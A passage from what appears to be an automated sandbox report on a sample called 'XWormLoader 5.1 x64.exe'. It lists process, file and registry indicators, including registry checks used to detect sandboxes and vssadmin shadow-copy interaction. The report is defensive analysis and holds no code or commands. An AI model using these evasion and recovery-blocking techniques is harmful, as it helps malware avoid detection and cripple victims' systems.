C:\Windows\Installer\MSI30C.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Installer\e58eb87.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\SystemTemp\~DF039D0D2B06756237.TMP msiexec.exe File created C:\Windows\inf\oem5.inf DrvInst.exe File opened for modification C:\Windows\Installer\MSI16D5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1705.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF548F2F8E879792EC.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIF6F1.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF46464373A5FC5C72.TMP msiexec.exe File created C:\Windows\Installer\SourceHash{8274048B-FF59-47CC-802A-8A7E6325D2D5} msiexec.exe File opened for modification C:\Windows\Installer\MSIF3F6.tmp msiexec.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml ReAgentc.exe File opened for modification C:\Windows\Installer\MSIEE05.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF30B.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log MsiExec.exe File opened for modification C:\Windows\inf\oem5.inf DrvInst.exe File opened for modification C:\Windows\Installer\MSI4E1.tmp msiexec.exe File opened for modification C:\Windows\Installer\{8C17366B-843B-49DC-AC1B-748DC264E06F}\ProductICO msiexec.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe File created C:\Windows\Installer\e58eb84.msi msiexec.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe File opened for modification C:\Windows\inf\oem3.inf DrvInst.exe -
Launches sc.exe 17 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 588 sc.exe 4116 sc.exe 5192 sc.exe 6264 sc.exe 5412 sc.exe 3380 sc.exe 5156 sc.exe 3876 sc.exe 6308 sc.exe 4252 sc.exe 7132 sc.exe 4580 sc.exe 7028 sc.exe 3812 sc.exe 3952 sc.exe 3860 sc.exe 5464 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qwadvk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qwadvk.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Filters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LowerFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 MsiExec.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\UpperFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 MsiExec.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags MsiExec.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs MsiExec.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\LowerFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\UpperFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Filters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Service DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Filters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\UpperFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Filters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Service DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\LowerFilters DrvInst.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\UpperFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID MsiExec.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Service DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Phantom DrvInst.exe -
Checks processor information in registry 2 TTPs 39 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Enumerates system info in registry 2 TTPs 12 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer XWormLoader 5.1 x64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion XWormLoader 5.1 x64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS XWormLoader 5.1 x64.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Interacts with shadow copies 3 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 6548 vssadmin.exe 6396 vssadmin.exe 2588 vssadmin.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Internet Explorer\TypedURLs XWormLoader 5.1 x64.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\RAS AutoDial\Default svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\msiexec.exe MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings\Telemetry\msiexec.exe\JScriptSetScriptStateStarted = "240714781" MsiExec.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133847771105955739" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings MsiExec.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe -
Modifies registry class 64 IoCs
